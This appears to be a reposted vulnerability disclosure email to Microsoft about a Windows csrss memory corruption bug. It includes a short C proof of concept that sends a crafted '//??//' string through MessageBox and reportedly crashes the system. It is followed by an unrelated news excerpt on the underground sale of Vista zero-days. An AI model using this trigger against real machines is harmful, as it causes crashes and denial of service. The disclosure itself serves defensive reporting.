最新vista漏洞Microsoft Windows csrss (?) memory corruption exploited in-the-wild

Dear Secure@microsoft.com,

 On  one  of  Russian  forum  security  vulnerability  is  discussed in
 Microsoft Windows (Windows XP is tested). A vulnerability is caused by
 memory  corruption  is  string  beginning  with  "/?/" is send thorugh
 MessageBox  API  with MB_SERVICE_NOTIFICATION flag. It looks like some
 "debug"  feature  not  cleaned  out  in  final release and it seems to
 exploitable to code execution at kernel level. Code example below:


#include <stdio.h>
#include <windows.h>

int main(void){
int i;
char bug1 [] ="//??//XXXX";
for(i = 0; i < 10; i ++)
{
 MessageBox(0, bug1, bug1, MB_SERVICE_NOTIFICATION);
}
}

System hangs, crashes (BSOD) or reboots. 

Underground hackers are hawking zero-day exploits for Microsoft's new Windows Vista operating system at $50,000 a pop, according to computer security researchers at Trend Micro.

The Windows Vista exploit—which has not been independently verified—was just one of many zero-days available for sale at an auction-style marketplace infiltrated by the Tokyo-based anti-virus vendor.

In an interview with eWEEK, Trend Micro's chief technology officer, Raimund Genes, said prices for exploits for unpatched code execution flaws are in the $20,000 to $30,000 range, depending on the popularity of the software and the reliability of the attack code.

Bots and Trojan downloaders that typically hijack Windows machines for use in spam-spewing botnets were being sold for about $5,000, Genes said.